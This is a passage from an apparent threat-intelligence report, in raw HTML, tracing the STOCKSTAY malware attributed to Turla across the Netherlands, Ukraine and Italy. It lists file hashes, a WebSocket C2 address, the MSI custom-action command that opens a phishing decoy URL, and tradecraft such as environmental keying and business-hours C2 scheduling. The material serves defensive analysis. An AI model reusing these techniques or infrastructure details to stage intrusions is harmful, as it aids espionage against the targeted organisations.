&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY configuration file&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;1a2ca8b8e0344fe3d80da7352206a470245443e2349a237bc093df934ddc011f&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Table 6: File indicators&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;December 5 – 6, 2023: Netherlands&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;A further RAR archive containing STOCKSTAY was submitted to VirusTotal at 2023-12-06 08:52:49 from the Netherlands, under the filename “apps_libwallets_v1.3.rar”. This archive was last modified the previous day at 2023-12-05 16:47:42. This pattern may indicate that the archive was created by the individual at the end of their working day, and then submitted the following day when they returned to the office.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This instance of STOCKSTAY was the first case observed by GTIG of the malware’s core functionality being separated into distinct role-based components, using the filenames shown in Table 7.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;div align="left"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;&lt;table border="1px" cellpadding="16px" style="border-collapse: collapse; width: 100%;"&gt;&lt;colgroup&gt;&lt;col /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Component&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Filename&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.STOCKMARKET&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;StockMarketView.exe&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.STOCKBROKER&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;StockMarketNet.exe&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.STOCKTRADER&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;StockMarketSystem.exe&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Table 7: STOCKSTAY component filenames observed in December 2023&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Similar to the sample observed in September 2023, this instance of STOCKSTAY also used environmental keying, however this instance used the target computer’s domain name as the configuration password. GTIG has been unable to recover the password at this time.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;div align="left"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;&lt;table&gt;&lt;colgroup&gt;&lt;col /&gt;&lt;col /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Filename&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Description&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;SHA-256&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;apps_libwallets_v1.3.rar&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;RAR archive containing STOCKSTAY components&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;81aabf646619ea5f4a72457cd3aa17c5988003d67e6454f45e7cb33613021bac&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;StockMarketView.exe&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.STOCKMARKET orchestrator&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;9164054d0bf0b7c8820da4f742860940998984555e65820e4fa8dd07b6bd67ec&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;StockMarketNet.exe&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.STOCKBROKER tunneler&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;34fcbe7e90fc87a4f3766469c19a64f24672d7adb99e0198f5ba10d58911368b&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;StockMarketSystem.exe&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.STOCKTRADER backdoor&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;0a545dd1b703cddfb3d582c8c70f65f556bbd580bfa836a387121eb837bda61b&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;default.conf&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY configuration file&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;2623c6e3c1f5a7b5e735a64813bc0e1382ae45831f5fadffb08c0e7b096627f7&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Table 8: File indicators&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;January 2024: Ukraine&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;GTIG conducted a review of an incident response conducted by Mandiant relating to a late-2023 compromise of a Ukrainian organization, in which we observed Turla deploying a wide range of tools into the victim’s network, including WILDDAY, DIAMONDBACK and KAZUAR, via malicious GPO installation from a compromised domain controller. This activity was accompanied by other simple scripts and backdoors to deploy malware across multiple machines in the infected organization. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;During the review, GTIG identified evidence of STOCKSTAY execution on one of the hosts impacted by the infected domain controller. Multiple ZIP archives, each containing one of the core components of STOCKSTAY or its configuration, were uploaded to the domain controller. The files were found in a directory used for staging registry files used to install WILDDAY both prior to and after STOCKSTAY appeared on the host, as well as for staging output from an otherwise unknown Powershell backdoor (iclsClient.ps1) which was also observed running from the domain controller.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;During this operation, an initial STOCKSTAY configuration file was deployed to the domain controller alongside the STOCKSTAY core component executables, however this file was not able to be decrypted using any known passwords or environmental identifiers. A short while later, Mandiant observed a second configuration file being deployed to the domain controller, this time encrypted using the domain name associated with the compromised network. GTIG assesses with moderate confidence that the deployment of the initial configuration file was either a mistake by the threat actor - perhaps deploying a configuration file associated with a different victim - or the result of a default or invalid configuration file being bundled with STOCKSTAY during initial deployment to prevent sensitive C2 details from being captured in the event of early detection of the malware in the victim’s environment.  &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The successfully decrypted configuration defined a STOCKSTAY WebSocket C2 URL of &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;wss://wool-basalt-clock.glitch.me/ws&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;. Additionally, the configuration specified an operational time-frame of Monday to Friday between the hours of 0900 and 1800 on the victim's system. This time-based restriction is likely intended to blend C2 communications with normal business operations in the victim's network. This same time-frame has been observed in a majority of STOCKSTAY configuration files analyzed by GTIG.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Of particular note, toward the end of this operation, Mandiant identified firewall detections relating to one of KAZUAR’s C2 endpoints. GTIG assesses, with low to moderate confidence, that the threat actor could have been aware of the suspicion surrounding its C2 and deployed STOCKSTAY as a failsafe in case KAZUAR was identified and remediated, thus enabling reinfection at a later date, in the event that STOCKSTAY remained undetected.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;div align="left"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;&lt;table border="1px" cellpadding="16px" style="border-collapse: collapse; width: 100%;"&gt;&lt;colgroup&gt;&lt;col /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Indicator&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Description&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;wss://wool-basalt-clock.glitch.me/ws&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY WebSocket C2&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Table 9: Network indicators&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;February 2024: Italy&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;An MSI file configured to install STOCKSTAY was uploaded to VirusTotal at 2024-02-20 11:45:26 from Italy, under the filename “Copia.msi”. The MSI masqueraded as the &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;ILSpy application developed by ICSharpCodeTeam, and contained a large number of legitimate benign components. The MSI installed the core STOCKSTAY components under &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;%LOCALAPPDATA%/Programs/SMN/&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, and enabled persistent execution via registry run keys. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The STOCKSTAY samples contained in the MSI were compiled between January 29 and January 31, 2024, with the configuration file last being modified on February 13, 2024, just a week before being submitted to VirusTotal.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In addition to the installation of STOCKSTAY, the MSI file contains a custom MSI action named “OpenUrl”. This action has the sequence number 1 in the InstallUISequence table, indicating it should be executed before any other actions. The custom action is configured to execute the following command:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;pre class="language-plain"&gt;&lt;code&gt;viewer.exe
https://circoloesteri.elezioni.idnet.it/admin-election/riepilogo.php&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;When viewed, the URL contains references to elections (“elezioni”) and the Italian organization “Circolo Degli Esteri”, which according to their official website (&lt;/span&gt;&lt;a href="https://www.circoloesteri.it/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;https://www.circoloesteri.it/&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;), was founded to “represent the Ministry of Foreign Affairs”. We do not currently assess that the actor was directly targeting Italian elections, and was instead using elections-related phishing lures to target victims. Due to limited visibility, we have been unable to identify any earlier stages of this particular operation, and cannot confirm the identity of the intended targets of any potential related phishing campaigns.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;pre class="language-plain"&gt;&lt;code&gt;Foreign Affairs Club 1936

Approval of the 2023 Financial Statement

Analysis of the status of those registered to vote (automatically updates every 60 seconds)...
update 6:26:50

Total Voters: 915
Currently registered members with 2-tonte status: 364
Currently registered with status 4 Ready to vote: 5
Currently registered with status 3 - Voted 46
Voter turnout (votes cast on registered voters): 5.03%&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="Italian-language decoy claiming to relate to Italy’s Circolo Degli Esteri" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/stockstay-fig7.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Figure 7: Italian-language decoy claiming to relate to Italy’s Circolo Degli Esteri&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Although inconclusive, this appears to indicate an intention to deploy STOCKSTAY against Italian-speaking individuals or organizations, specifically with a focus on foreign affairs.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In following with previous STOCKSTAY instances, this sample utilized environmental keying for its configuration file. GTIG was able to recover the domain name used to decrypt the configuration file in order to identify the WebSocket C2 address &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;wss://wool-basalt-clock.glitch.me/ws&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;. This matches the C2 address used in January 2024.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;div align="left"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;&lt;table&gt;&lt;colgroup&gt;&lt;col /&gt;&lt;col /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Filename&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Description&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;SHA-256&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;Copia.msi&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;MSI containing STOCKSTAY components&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;b064a3efb04ed77e6c57955089ce639e193d166c8ea2216c98c3e9b701ea2cff&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;StockMarketView.exe&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.STOCKMARKET orchestrator&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;82707cfdf24dcb762f4615f01e1ba4d3dfdec4abe9cd588558d2634d7e6a5eeb&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;StockMarketNet.exe&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.STOCKBROKER tunneler&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;249a4c7cacdd8e99a2a089a5c0ce904f2eff22e0e40fcfb10f7824dca6c51ecb&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;StockMarketSystem.exe&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.STOCKTRADER backdoor&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;b728eba4f0d6d16602fbad05a591f14391594262d3584b2e249e97f86e4dcc5a&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;default.conf&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY configuration file&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;40b1208dda0cd5dd95c6b57764b2cfe7145b3ed9457f498408b4aaa05bf3ef50&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
